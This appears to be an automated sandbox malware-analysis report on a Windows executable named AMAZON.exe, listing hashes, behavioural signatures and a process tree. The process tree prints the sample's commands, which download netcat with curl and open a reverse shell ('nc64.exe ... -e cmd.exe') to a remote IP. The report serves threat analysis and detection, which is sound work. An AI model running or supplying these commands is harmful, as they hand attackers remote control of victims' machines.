Analysis

  • max time kernel
    148s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240226-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    16/03/2024, 03:27

General

  • Target

    AMAZON.exe

  • Size

    6.9MB

  • MD5

    212add35db896389ea8bf5311efdb7d5

  • SHA1

    621729e6b12ce455b4453048ecfe235ec662af69

  • SHA256

    644fd7573f72e1b904a7b2ba5c5534af6fe414345fe70b0411213018f6ebfba5

  • SHA512

    70dbaf73886bb53a67917fd9f13cd974da9caef7c45e4b4fec4e946cff251262da288bcc96c07ed7fe04e64f3bee3ee1e931c3cd892e98dba1909dcf2ec532fa

  • SSDEEP

    98304:ZnbIMfow2LmvNA1h9eT393YigJhH0yqTu/NWPdHdda9D4oREKYTA+qHP1w:ZnbIT2A1HeT39Iig+c0/aFFriADv

Score
7/10

Malware Config

Signatures

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 4 IoCs
  • Modifies system executable filetype association 2 TTPs 2 IoCs
  • Registers COM server for autorun 1 TTPs 64 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SendNotifyMessage 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\AMAZON.exe
    "C:\Users\Admin\AppData\Local\Temp\AMAZON.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:452
    • C:\Users\Admin\AppData\Local\Temp\AMAZON.exe
      "C:\Users\Admin\AppData\Local\Temp\AMAZON.exe"
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:4228
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c curl https://eternallybored.org/misc/netcat/netcat-win32-1.11.zip -o netcat.zip
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1104
        • C:\Windows\system32\curl.exe
          curl https://eternallybored.org/misc/netcat/netcat-win32-1.11.zip -o netcat.zip
          4⤵
            PID:3188
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c nc64.exe 192.168.238.130 169 -e cmd.exe
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3344
          • C:\Users\Admin\AppData\Local\Temp\netcat-1.11\nc64.exe
            nc64.exe 192.168.238.130 169 -e cmd.exe
            4⤵
            • Executes dropped EXE
            PID:4892
    • C:\Windows\System32\rundll32.exe
      C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
      1⤵
        PID:3652
      • C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe
        "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe"
        1⤵
        • Modifies system executable filetype association
        • Registers COM server for autorun
        • Checks processor information in registry
        • Modifies Internet Explorer settings
        • Modifies registry class
        • Suspicious behavior: AddClipboardFormatListener
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of SetWindowsHookEx
        PID:5068

Downloads